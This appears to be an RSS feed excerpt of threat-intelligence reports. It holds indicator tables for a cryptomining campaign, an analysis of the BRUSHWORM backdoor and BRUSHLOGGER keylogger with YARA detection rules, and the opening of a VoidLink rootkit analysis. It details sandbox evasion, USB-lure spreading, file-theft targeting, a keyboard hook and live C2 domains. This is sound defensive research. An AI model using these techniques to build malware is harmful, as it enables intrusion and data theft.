<td align="left"><code>23-01-26</code>, <code>14-01-26</code>, <code>03-01-26</code>, <code>24-12-25</code>, <code>25-11-25</code>, <code>08-11-25</code>, <code>29-01-25</code>, <code>09.11.23</code></td>
</tr>
<tr>
<td align="left">Mutex / C2 Comms key</td>
<td align="left"><code>Aesthetics135</code></td>
</tr>
</tbody>
</table>
<p><strong>PureMiner</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>7.0.6</code>, <code>7.0.7</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>wndlogon.hopto[.]org</code>&lt;br /&gt;<code>wndlogon.itemdb[.]com</code>&lt;br /&gt;<code>wndlogon.ydns[.]eu</code>&lt;br /&gt;<code>wndlogon.kozow[.]com</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>24-10-25</code>, <code>23-11-25</code>, <code>15-09-25-MassUpdt</code>, <code>11-09-25</code>, <code>08-08-RAM</code>, <code>06-08-RAM</code>, <code>04-08-RAM</code>, <code>31-07-RAM</code>, <code>03-08-RAM</code>, <code>13-03-25</code>, <code>25-07-RAMwALL</code>, <code>25-11-25</code></td>
</tr>
<tr>
<td align="left">Wallet Address</td>
<td align="left"><code>89WoZKYoHhcNEFRV8jjB6nDqzjiBtQqyp4agGfyHwED1XyVAoknfVsvY1CwEHG6nwZFJGFTF5XbqC4tAQbnoFFCX8UQof3G</code></td>
</tr>
<tr>
<td align="left">Mutex / C2 Comms key</td>
<td align="left"><code>4c271ad41ea2f6a44ce8d0</code></td>
</tr>
</tbody>
</table>
<p><strong>Custom XMRig Loader</strong></p>
<table>
<thead>
<tr>
<th align="left">Wallet Addresses</th>
<th align="left"><code>87NnUp8GKVBZ8pFV75Gas4A5nMMH7gEeo8AXBhm9Q6vS5oQ6SzCYf1bJr7Lib35VN2UX271PAXeqRFDmjo5SXm3zFDfDSWD</code>, <code>83sDbPzoghAX45hA2Y26xvaDsKv8TLymAGKKyZwrCKB3T9kuuYBDzb64vfy9XQyrpUFQ4r8u3V2T1EzqE6CR27XmMCCwGu1</code></th>
</tr>
</thead>
</table>
<p><strong>AsyncRAT</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>0.5.8</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>wndlogon.hopto[.]org</code>&lt;br /&gt;<code>wndlogon.itemdb[.]com</code>&lt;br /&gt;<code>wndlogon.ydns[.]eu</code>&lt;br /&gt;<code>wndlogon.kozow[.]com</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>BL_Bckp_250525</code></td>
</tr>
</tbody>
</table>
<p><strong>PulsarRAT</strong></p>
<table>
<thead>
<tr>
<th align="left">Versions</th>
<th align="left"><code>1.5.1</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">C2s</td>
<td align="left"><code>wndlogon.hopto[.]org</code>&lt;br /&gt;<code>wndlogon.itemdb[.]com</code>&lt;br /&gt;<code>wndlogon.ydns[.]eu</code>&lt;br /&gt;<code>wndlogon.kozow[.]com</code></td>
</tr>
<tr>
<td align="left">Campaign/Build IDs</td>
<td align="left"><code>18-04-25</code></td>
</tr>
</tbody>
</table>
<p><strong>SilentCryptoMiner</strong></p>
<table>
<thead>
<tr>
<th align="left">Mining Pool</th>
<th align="left"><code>gulf.moneroocean[.]stream:10128</code></th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Wallet</td>
<td align="left"><code>83Q1PKZ5yXsP8SCqjV3aV7B3UoBB3skPp49G1VnnGtv5Y5EUbFQTXvzR9cZshBYBBfd8Dm1snkkud431pdzEZ2uJTad1CiC</code></td>
</tr>
<tr>
<td align="left">Password</td>
<td align="left"><code>CPUrig</code></td>
</tr>
<tr>
<td align="left">Mining proxy/fallback</td>
<td align="left"><code>172.94.15[.]211:5443</code></td>
</tr>
<tr>
<td align="left">Domain</td>
<td align="left"><code>softappsbase[.]top</code></td>
</tr>
<tr>
<td align="left">Domain</td>
<td align="left"><code>autoupdatewinsystem[.]top</code></td>
</tr>
<tr>
<td align="left">Domain</td>
<td align="left"><code>softwaredatabase[.]xyz</code></td>
</tr>
<tr>
<td align="left">Configuration path</td>
<td align="left"><code>https://softappsbase[.]top/UnammnrsettingsCPU.txt</code></td>
</tr>
<tr>
<td align="left">Configuration path</td>
<td align="left"><code>https://autoupdatewinsystem[.]top/UWP1/cpu.txt</code></td>
</tr>
<tr>
<td align="left">Configuration path</td>
<td align="left"><code>https://softwaredatabase[.]xyz/UnammnrsettingsCPU.txt</code></td>
</tr>
<tr>
<td align="left">Communication endpoint</td>
<td align="left"><code>https://softappsbase[.]top/UnamWebPanel7/api/endpoint.php</code></td>
</tr>
<tr>
<td align="left">Communication endpoint</td>
<td align="left"><code>https://autoupdatewinsystem[.]top/UWP1/api/endpoint.php</code></td>
</tr>
<tr>
<td align="left">Communication endpoint</td>
<td align="left"><code>https://softwaredatabase[.]xyz/UnamWebPanel7/api/endpoint.php</code></td>
</tr>
</tbody>
</table>
<p>Here is a <a href="https://gist.github.com/jiayuchann/6728db5acef7b2793a6afa77b600c7c6">GitHub Gist</a> of a list of sample hashes.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/fake-installers-to-monero/fake-installers-to-monero.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Elastic Security Labs uncovers BRUSHWORM and BRUSHLOGGER]]></title>
            <link>https://www.elastic.co/security-labs/brushworm-targets-financial-services</link>
            <guid>brushworm-targets-financial-services</guid>
            <pubDate>Fri, 27 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs observed two custom malware components targeting a South Asian financial institution: a modular backdoor with USB-based spreading and a DLL-side-loaded keylogger.]]></description>
            <content:encoded><![CDATA[<h2>Key takeaways</h2>
<ul>
<li>A South Asian financial institution was targeted with two custom malware components: a modular backdoor (<strong>BRUSHWORM)</strong>  and a keylogger (<strong>BRUSHLOGGER)</strong></li>
<li><strong>BRUSHWORM</strong>  features anti-analysis checks, AES-CBC encrypted configuration, scheduled task persistence, modular DLL payload downloading, USB worm propagation, and broad file theft targeting documents, spreadsheets, email archives, and source code</li>
<li>The keylogger masquerades as libcurl via DLL side-loading, capturing system-wide keystrokes with window context tracking and XOR-encrypted log files</li>
<li>Multiple earlier testing versions (<code>V1.exe</code>, <code>V2.exe</code>, etc.) were discovered on VirusTotal, some using free dynamic DNS infrastructure, indicating iterative development</li>
</ul>
<h2>Introduction</h2>
<p>During a recent investigation, Elastic Security Labs identified malware deployed on a South Asian financial institution’s infrastructure. The victim environment had only SIEM-level visibility enabled, which limited post-exploitation telemetry. The intrusion involved two custom binaries: a backdoor named <code>paint.exe</code> and a keylogger masquerading as <code>libcurl.dll</code>.</p>
<p><strong>BRUSHWORM</strong> functions as the primary implant, responsible for installation, persistence, command-and-control communication, downloading additional modular payloads, spreading via removable media, and stealing files with targeted extensions. <strong>BRUSHLOGGER</strong> supplements this by capturing system-wide keystrokes via a simple Windows keyboard hook and logging the active window context for each keystroke session.</p>
<p>Neither binary employs meaningful code obfuscation, packing, or advanced anti-analysis techniques. The overall quality of the code is low — for example, the backdoor writes its decrypted configuration to disk in cleartext before encrypting and saving a second copy, then deletes the cleartext file. Given the absence of a kill switch, the use of free dynamic DNS servers in testing versions, and some coding mistakes, we assess with moderate confidence that the author is relatively inexperienced and may have leveraged AI code-generation tools during development without fully reviewing the output.</p>
<p>Through VirusTotal pivoting, we identified what appear to be earlier development and testing versions of the backdoor uploaded under filenames such as <code>V1.exe</code>, <code>V2.exe</code>, and <code>V4.exe</code>, with varying configurations.</p>
<h2>BRUSHWORM code analysis</h2>
<p>The backdoor is the primary implant responsible for establishing persistence, communicating with the C2 server, downloading modular payloads, spreading to removable media, and exfiltrating files.</p>
<h3>Anti-analysis and sandbox detection</h3>
<p>The malware begins execution with a series of environment checks designed to detect analysis environments, though the techniques are straightforward and lack sophistication.</p>
<p><strong>Screen resolution check:</strong> If the display resolution is less than 1024×768 pixels, execution terminates immediately. This is a common sandbox detection technique.</p>
<p><strong>Username and computer name check:</strong> The malware checks whether the machine's username or the computer name is “<code>sandbox</code>”. If either condition matches, it terminates. These checks target the default name commonly used in analysis sandboxes.</p>
<p><strong>Hypervisor detection:</strong> Using the <code>CPUID</code> instruction, the malware queries the hypervisor vendor string and compares it against the following known virtualization platforms:</p>
<table>
<thead>
<tr>
<th>Hypervisor Vendor String</th>
<th>Platform</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>VMWAREVMWARE</code></td>
<td>VMware</td>
</tr>
<tr>
<td><code>KVMKVMKVM</code></td>
<td>KVM</td>
</tr>
<tr>
<td><code>XENVMMXENVMM</code></td>
<td>Xen</td>
</tr>
<tr>
<td><code>PRL HYPERV</code></td>
<td>Parallels</td>
</tr>
<tr>
<td><code>TCGTCGTCGTCG</code></td>
<td>QEMU (TCG)</td>
</tr>
<tr>
<td><code>ACRNACRNACRN</code></td>
<td>ACRN</td>
</tr>
<tr>
<td><code>MICROSOFT HV</code></td>
<td>Hyper-V</td>
</tr>
</tbody>
</table>
<p>If a hypervisor is detected, the malware does not terminate — it merely sleeps for one second before continuing execution.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image14.png" alt="Hypervisor vendor string comparison using the CPUID instruction" title="Hypervisor vendor string comparison using the CPUID instruction" /></p>
<p><strong>Mouse activity check:</strong> After the initial setup, the malware monitors mouse movement for 5 minutes. If the cursor does not move during this period, execution terminates. This acts as an additional sandbox evasion measure.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image7.png" alt="Mouse movement monitoring over a 5-minute window" title="Mouse movement monitoring over a 5-minute window" /></p>
<h3>Installation and directory setup</h3>
<p>On first execution, the malware creates multiple hidden directories with hardcoded paths. These directories serve distinct roles throughout the malware's lifecycle:</p>
<table>
<thead>
<tr>
<th>Directory</th>
<th>Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>C:\ProgramData\Photoes\Pics\</code></td>
<td>Main installation folder for the backdoor binary</td>
</tr>
<tr>
<td><code>C:\Users\Public\Libraries\</code></td>
<td>Storage for downloaded modules from the C2 server (e.g., <code>Recorder.dll</code>)</td>
</tr>
<tr>
<td><code>C:\Users\Public\AppData\Roaming\Microsoft\Vault\</code></td>
<td>Storage of the encrypted configuration file (<code>keyE.dat</code>)</td>
</tr>
<tr>
<td><code>C:\Users\Public\Systeminfo\</code></td>
<td>Staging directory for stolen files</td>
</tr>
<tr>
<td><code>C:\Users\Public\AppData\Roaming\NuGet\</code></td>
<td>Tracks exfiltrated file paths with their SHA-256 hashes (<code>hashconfig</code>)</td>
</tr>
</tbody>
</table>
<p>The misspelling &quot;Photoes&quot; (instead of &quot;Photos&quot;) is consistent across both the backdoor and keylogger components and appears to be an authentic mistake by the author to blend with the other user’s media directories.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image4.png" alt="The malware checks whether the installation directory already exists" title="The malware checks whether the installation directory already exists" /></p>
<h3>Configuration decryption</h3>
<p>The backdoor's configuration is stored as a JSON structure with field values encrypted using AES-CBC. The AES key is hardcoded in the binary, while the initialization vector (IV) is prepended to each encrypted field's data blob.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image10.png" alt="AES-CBC decryption of configuration fields with a hardcoded key and an embedded IV" title="AES-CBC decryption of configuration fields with a hardcoded key and an embedded IV" /></p>
<p>The decrypted configuration follows this structure:</p>
<pre><code class="language-json">{
  &quot;internetCheckDomain&quot;: &quot;&lt;...&gt;&quot;,
  &quot;downloadDomain&quot;: &quot;&lt;...&gt;&quot;,
  &quot;retryCount&quot;: 0
}
</code></pre>
<p>This configuration is not referenced anywhere in the malware's operational logic. The C2 server address that the backdoor actually communicates with is a separate C++ global string variable stored in cleartext(<code>resources.dawnnewsisl[.]com/updtdll</code>), which is passed directly to the function responsible for C2 communication and payload downloads.<br />
<img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image11.png" alt="Download_payload function call" title="Download_payload function call" /></p>
<p>The decrypted configuration fields (<code>internetCheckDomain</code>, <code>downloadDomain</code>, <code>retryCount</code>) go entirely unused in this build. This configuration is likely intended for a future version, a separate payload component, or was simply disabled in the deployed build, reinforcing the impression of a codebase under active, disorganized development.</p>
<h3>Persistence</h3>
<p>The malware establishes persistence by creating a Windows scheduled task named <code>MSGraphics</code> through the COM Task Scheduler interface. The task is configured to execute the malware binary each time a user logs in, ensuring the backdoor survives system reboots.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image1.png" alt="Persistence was established through a COM-based scheduled task named MSGraphics" title="Persistence was established through a COM-based scheduled task named MSGraphics" /></p>
<h3>Payload download and execution</h3>
<p>The backdoor uses the WinHTTP library to issue a <code>GET</code> request to the C2 server at the URI <code>/updtdll</code> to download a DLL payload. The downloaded binary is written to <code>C:\Users\Public\Libraries\</code> as <code>Recorder.dll</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image3.png" alt="WinHTTP GET request to /updtdll to fetch the DLL payload" title="WinHTTP GET request to /updtdll to fetch the DLL payload" /></p>
<p>We were unable to recover the downloaded payload during our investigation, but the naming convention and execution method suggest it is a modular plugin — likely providing additional post-exploitation capabilities such as screen recording or data exfiltration.</p>
<p>The downloaded DLL is executed by creating a second scheduled task named MSRecorder that uses <code>rundll32.exe</code> to load and run it. This mirrors the same COM-based scheduled task creation method used for persistence.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image13.png" alt="" /></p>
<p>The C2 server's SSL certificate is issued by Let's Encrypt.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image6.png" alt="Let's Encrypt SSL certificate used by the C2 server" title="Let's Encrypt SSL certificate used by the C2 server" /></p>
<h3>USB spreading and file theft</h3>
<p>Once <strong>BRUSHWORM</strong> detects that the host is already infected (by checking for the presence of the installation directory), its behavior diverges based on internet connectivity. The malware performs a connectivity check by attempting to reach <code>www.google.com</code>.</p>
<h4>Scenario 1 — Internet access available:</h4>
<p>The malware spawns two threads targeting external storage devices:</p>
<ol>
<li><strong>Removable drive infection:</strong> The backdoor copies itself to any connected removable storage devices using socially-engineered filenames designed to entice victims in a corporate financial environment:
<ul>
<li><code>Salary Slips.exe</code></li>
<li><code>Notes.exe</code></li>
<li><code>Documents.exe</code></li>
<li><code>Important.exe</code></li>
<li><code>Dont Delete.exe</code></li>
<li><code>Presentation.exe</code></li>
<li><code>Emails.exe</code></li>
<li><code>Attachments.exe</code></li>
</ul>
</li>
<li><strong>File theft from removable and optical drives:</strong> Both threads enumerate files on the connected media and exfiltrate to a folder any file matching a broad set of targeted extensions:</li>
</ol>
<table>
<thead>
<tr>
<th>Category</th>
<th>Extensions</th>
</tr>
</thead>
<tbody>
<tr>
<td>Documents &amp; Word Processing</td>
<td><code>.doc</code>, <code>.docx</code>, <code>.dot</code>, <code>.dotx</code>, <code>.wps</code>, <code>.wpd</code>, <code>.wp</code>, <code>.rtf</code>, <code>.txt</code>, <code>.odt</code>, <code>.ott</code>, <code>.pages</code></td>
</tr>
<tr>
<td>Spreadsheets</td>
<td><code>.xls</code>, <code>.xlsx</code>, <code>.xlsm</code>, <code>.xlt</code>, <code>.xltx</code>, <code>.xlw</code>, <code>.ods</code>, <code>.ots</code>, <code>.csv</code>, <code>.tsv</code>, <code>.dbf</code>, <code>.wk1</code>, <code>.wk3</code>, <code>.wk4</code>, <code>.123</code></td>
</tr>
<tr>
<td>Presentations</td>
<td><code>.ppt</code>, <code>.pptx</code>, <code>.pot</code>, <code>.potx</code>, <code>.pps</code>, <code>.ppsx</code>, <code>.odp</code>, <code>.otp</code>, <code>.key</code>, <code>.sxi</code></td>
</tr>
<tr>
<td>Portable &amp; Layout</td>
<td><code>.pdf</code>, <code>.xps</code>, <code>.epub</code>, <code>.mobi</code>, <code>.ps</code>, <code>.prn</code>, <code>.tex</code>, <code>.latex</code>, <code>.pub</code>, <code>.p65</code>, <code>.fm</code></td>
</tr>
<tr>
<td>Archives &amp; Disk Images</td>
<td><code>.zip</code>, <code>.rar</code>, <code>.7z</code>, <code>.tar</code>, <code>.gz</code>, <code>.bz2</code>, <code>.xz</code>, <code>.iso</code>, <code>.cab</code>, <code>.arj</code>, <code>.lzh</code>, <code>.lha</code>, <code>.tgz</code>, <code>.tbz</code>, <code>.txz</code></td>
</tr>
<tr>
<td>Email &amp; Notes</td>
<td><code>.pst</code>, <code>.ost</code>, <code>.msg</code>, <code>.eml</code>, <code>.emlx</code>, <code>.mbox</code>, <code>.mbx</code>, <code>.maildir</code>, <code>.one</code></td>
</tr>
<tr>
<td>Code &amp; Data</td>
<td><code>.py</code>, <code>.md</code>, <code>.xml</code>, <code>.json</code></td>
</tr>
</tbody>
</table>
<p>Stolen files are staged in the <code>C:\Users\Public\Systeminfo\</code> directory. The malware also maintains a tracking file (<code>hashconfig</code>) at <code>C:\Users\Public\AppData\Roaming\NuGet\</code> that records each exfiltrated file's path alongside its SHA-256 hash, likely to avoid re-exfiltrating the same files on subsequent runs.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image9.png" alt="Removable drive infection with lure filenames and file theft by extension" title="Removable drive infection with lure filenames and file theft by extension" /></p>
<h4>Scenario 2 — No internet access:</h4>
<p>If the internet connectivity check fails, the malware still infects removable drives with the same lure-named copies. However, in this scenario, it additionally copies stolen files and files from the user's profile directory (matching the same extension list) to the removable drives. This behavior serves as a data exfiltration bridge for <strong>environments with restricted or air-gapped network access</strong> — using USB drives to physically carry stolen data off the network.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image12.png" alt="Offline mode: stolen files copied to removable drives for physical exfiltration" title="Offline mode: stolen files copied to removable drives for physical exfiltration" /></p>
<h2>BRUSHLOGGER code analysis</h2>
<p>The second component is a 32-bit Windows DLL (<code>4f1ea5ed6035e7c951e688bd9c2ec47a1e184a81e9ae783d4a0979501a1985cf</code>) designed for DLL side-loading. It masquerades as <code>libcurl.dll</code> by exporting seven standard <code>curl_easy_*</code> API functions, all of which are empty stubs pointing to a single <code>RET</code> instruction. The malicious functionality executes entirely from the <code>DllMain</code> entry point on <code>DLL_PROCESS_ATTACH</code>.</p>
<h3>Initialization</h3>
<p>At startup, the keylogger decodes a mutex name from a Base64-encoded string: “<code>Windows-Updates-KB852654856</code>”. The mutex name mimics a Windows Update knowledge base identifier. If <code>CreateMutexA</code> returns <code>ERROR_ALREADY_EXISTS</code>, the process terminates immediately to enforce single-instance execution.</p>
<p><strong>BRUSHLOGGER</strong> retrieves the current Windows username via <code>GetUserNameA</code>, computes its MD5 hash using the Windows CryptoAPI, and constructs the final log file path:</p>
<pre><code>C:\programdata\Photoes\&lt;username&gt;_&lt;MD5(username)&gt;.trn
</code></pre>
<p>The log file is initially created with <code>CreateFileA</code> using <code>CREATE_NEW</code>, then reopened with <code>FILE_APPEND_DATA</code> access for append-mode writing throughout the session.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image8.png" alt="Log file creation" title="Log file creation" /></p>
<h3>Hook installation and message pump</h3>
<p>After file setup, the keylogger installs a low-level keyboard hook:</p>
<pre><code class="language-c">SetWindowsHookExA(WH_KEYBOARD_LL, keyboard_hook_callback, NULL, 0);
</code></pre>
<p>The <code>WH_KEYBOARD_LL</code> hook type captures keyboard input system-wide across all threads and processes. The hook procedure runs in the context of the installing thread, requiring a standard Windows message pump (<code>GetMessageA</code> / <code>TranslateMessage</code> / <code>DispatchMessageA</code>) to keep the hook alive.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image2.png" alt="Keyboard hook installation and message pump" title="Keyboard hook installation and message pump" /></p>
<h3>Keystroke capture logic</h3>
<p>The core capture logic resides in the hook callback, which processes every keyboard event in the system.</p>
<p>For each keystroke event, the callback:</p>
<ol>
<li>Retrieves the foreground window handle via <code>GetForegroundWindow</code></li>
<li>Allocates memory via <code>VirtualAlloc</code> for the window title</li>
<li>Captures the current timestamp via <code>GetLocalTime</code>, formatted as <code>DD-MM-YYYY HH:MM</code></li>
<li>Retrieves the window title bar text via <code>GetWindowTextA</code></li>
</ol>
<p>When the foreground window changes, a context marker is appended to the keystroke buffer:</p>
<pre><code>\n&lt;timestamp&gt; &lt;window title&gt;\n
</code></pre>
<p><strong>Keystroke encoding:</strong> The callback processes <code>WM_KEYDOWN</code>, <code>WM_SYSKEYDOWN</code>, <code>WM_KEYUP</code>, and <code>WM_SYSKEYUP</code> messages. Each keystroke is logged as a two-digit hexadecimal virtual key.</p>
<h3>XOR-encrypted log files</h3>
<p>The flush routine copies the keystroke buffer to a local stack buffer, XOR-encrypts each byte with a hardcoded single-byte key <code>0x43</code>, and writes the result to the log file via <code>WriteFile</code>. After a successful write, the global buffer is cleared.</p>
<p>The XOR key <code>0x43</code> is trivially reversible — the encryption serves only as basic obfuscation rather than meaningful cryptographic protection.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/image5.png" alt="XOR decrypting a keylogger file with the byte 0x43" title="XOR decrypting a keylogger file with the byte 0x43" /></p>
<h2>Conclusion</h2>
<p>Despite their low sophistication and multiple implementation flaws, these two binaries deliver a functional collection platform that combines modular payload loading, USB worm propagation, broad file theft with air-gap bridging, and persistent keystroke capture via DLL side-loading. The iterative testing versions and active C2 infrastructure suggest an actor still refining their toolset. Elastic Security Labs will continue monitoring this activity cluster.</p>
<h2>BRUSHLOGGER, BRUSHWORM, and MITRE ATT&amp;CK</h2>
<p>Elastic uses the <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.</p>
<h3>Tactics</h3>
<p>Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/tactics/TA0002/">Execution</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0003/">Persistence</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0005/">Defense Evasion</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0006/">Credential Access</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0007/">Discovery</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0008/">Lateral Movement</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0009/">Collection</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0010/">Exfiltration</a></li>
<li><a href="https://attack.mitre.org/tactics/TA0011/">Command and Control</a></li>
</ul>
<h3>Techniques</h3>
<p>Techniques represent how an adversary achieves a tactical goal by performing an action.</p>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1053/005/">Scheduled Task/Job: Scheduled Task</a></li>
<li><a href="https://attack.mitre.org/techniques/T1574/002/">Hijack Execution Flow: DLL Side-Loading</a></li>
<li><a href="https://attack.mitre.org/techniques/T1056/001/">Input Capture: Keylogging</a></li>
<li><a href="https://attack.mitre.org/techniques/T1027/">Obfuscated Files or Information</a></li>
<li><a href="https://attack.mitre.org/techniques/T1140/">Deobfuscate/Decode Files or Information</a></li>
<li><a href="https://attack.mitre.org/techniques/T1497/001/">Virtualization/Sandbox Evasion: System Checks</a></li>
<li><a href="https://attack.mitre.org/techniques/T1074/001/">Data Staged: Local Data Staging</a></li>
<li><a href="https://attack.mitre.org/techniques/T1091/">Replication Through Removable Media</a></li>
<li><a href="https://attack.mitre.org/techniques/T1119/">Automated Collection</a></li>
<li><a href="https://attack.mitre.org/techniques/T1025/">Data from Removable Media</a></li>
<li><a href="https://attack.mitre.org/techniques/T1010/">Application Window Discovery</a></li>
<li><a href="https://attack.mitre.org/techniques/T1105/">Ingress Tool Transfer</a></li>
<li><a href="https://attack.mitre.org/techniques/T1036/005/">Masquerading: Match Legitimate Name or Location</a></li>
</ul>
<h2>Detecting BRUSHLOGGER and BRUSHWORM</h2>
<h3>YARA</h3>
<p>Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the BRUSHWORM and BRUSHLOGGER:</p>
<pre><code>rule Windows_Trojan_BrushLogger_304ee146 {
    meta:
        author = &quot;Elastic Security&quot;
        os = &quot;Windows&quot;
        arch = &quot;x86&quot;
        category_type = &quot;Trojan&quot;
        family = &quot;BrushLogger&quot;
        threat_name = &quot;Windows.Trojan.BrushLogger&quot;
        reference_sample = &quot;4f1ea5ed6035e7c951e688bd9c2ec47a1e184a81e9ae783d4a0979501a1985cf&quot;

    strings:
        $a = &quot;%02d-%02d-%d %02d:%02d &quot; fullword
        $b = { 81 ?? ?? A1 00 00 00 74 09 81 ?? ?? A0 00 00 00 75 09 6A 00 6A 10 E8 }
    condition:
        all of them
}

rule Windows_Trojan_BrushWorm_7c2098ef {
    meta:
        author = &quot;Elastic Security&quot;
        os = &quot;Windows&quot;
        arch = &quot;x86&quot;
        category_type = &quot;Trojan&quot;
        family = &quot;BrushWorm&quot;
        threat_name = &quot;Windows.Trojan.BrushWorm&quot;
        reference_sample = &quot;89891aa3867c1a57512d77e8e248d4a35dd32e99dcda0344a633be402df4a9a7&quot;

    strings:
        $a = &quot;internetCheckDomain&quot; wide fullword
        $b = { B8 00 00 00 40 33 C9 0F A2 48 8D ?? ?? ?? 89 07 89 5F 04 89 4F 08 89 57 0C 45 33 C0 }
    condition:
        all of them
}
</code></pre>
<h2>Observations</h2>
<p>The following observables were discussed in this research.</p>
<table>
<thead>
<tr>
<th align="left">Observable</th>
<th align="left">Type</th>
<th align="left">Name</th>
<th align="left">Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><code>89891aa3867c1a57512d77e8e248d4a35dd32e99dcda0344a633be402df4a9a7</code></td>
<td align="left">SHA-256</td>
<td align="left">paint.exe</td>
<td align="left">BRUSHWORM</td>
</tr>
<tr>
<td align="left"><code>4f1ea5ed6035e7c951e688bd9c2ec47a1e184a81e9ae783d4a0979501a1985cf</code></td>
<td align="left">SHA-256</td>
<td align="left">libcurl.dll</td>
<td align="left">BRUSHLOGGER</td>
</tr>
<tr>
<td align="left"><code>resources.dawnnewsisl[.]com/updtdll</code></td>
<td align="left">domain-name</td>
<td align="left"></td>
<td align="left">C2 server</td>
</tr>
</tbody>
</table>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/brushworm-targets-financial-services/brushworm-targets-financial-services.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Illuminating VoidLink: Technical analysis of the VoidLink rootkit framework]]></title>
            <link>https://www.elastic.co/security-labs/illuminating-voidlink</link>
            <guid>illuminating-voidlink</guid>
            <pubDate>Thu, 26 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs analyzes VoidLink, a sophisticated Linux malware framework that combines traditional Loadable Kernel Modules with eBPF to maintain persistence.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>During a recent investigation, we came across a data dump containing source code, compiled binaries, and deployment scripts for the kernel rootkit components of <a href="https://research.checkpoint.com/2026/voidlink-the-cloud-native-malware-framework/">VoidLink</a>, a cloud-native Linux malware framework first documented by Check Point Research in January 2026. Check Point's analysis revealed VoidLink to be a sophisticated, modular command-and-control framework written in Zig, featuring cloud-environment detection, a plugin ecosystem of over 30 modules, and multiple rootkit capabilities spanning userland rootkits (<code>LD_PRELOAD</code>), Loadable Kernel Modules (LKMs), and eBPF. In a <a href="https://research.checkpoint.com/2026/voidlink-early-ai-generated-malware-framework/">follow-up publication</a>, Check Point presented compelling evidence that VoidLink was developed almost entirely through AI-assisted workflows using the TRAE integrated development environment (IDE), with a single developer producing the framework, from concept to functional implant, in under a week.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/illuminating-voidlink/image1.png" alt="Data dump" title="Terminal view showing a directory listing, with mixed files, scripts, archives, and binaries, used to illustrate the structure and complexity of raw data dumps." /></p>
<p>The data dump we obtained, which we attribute to the same Chinese-speaking threat actor, based on matching Simplified Chinese source comments and Alibaba Cloud infrastructure, contained the raw development history of VoidLink's rootkit subsystem. What Check Point described as a deployable stealth module, selected dynamically based on the target kernel version, was laid bare in our data dump as a multigenerational rootkit framework that had been actively developed, tested, and iterated across real targets, spanning CentOS 7 through Ubuntu 22.04.</p>
<p>The rootkit components masquerade under the module name <code>vl_stealth</code> (or, in some variants, <code>amd_mem_encrypt</code>), consistent with the kernel-level concealment capabilities described in Check Point's analysis. Their architecture immediately stood out: Rather than relying on a single technique, the rootkit combines a traditional LKM with eBPF programs in a hybrid design that we’ve rarely encountered in the wild. The LKM handles deep kernel manipulation, syscall hooking via ftrace, and an Internet Control Message Protocol–based (ICMP-based) covert command channel, while a companion eBPF program takes over the delicate task of hiding network connections from the <code>ss</code> utility by manipulating Netlink socket responses in userspace memory.</p>
<p>Across the data, we identified at least four distinct generations of VoidLink, each one refining its hooking strategy, evasion techniques, and operational stability. The earliest variant targeted CentOS 7 with direct syscall table patching. The most recent variant, which the developers dubbed &quot;Ultimate Stealth v5&quot; in their comments, introduces delayed hook installation, anti-debugging timers, process kill protection, and XOR-obfuscated module names.</p>
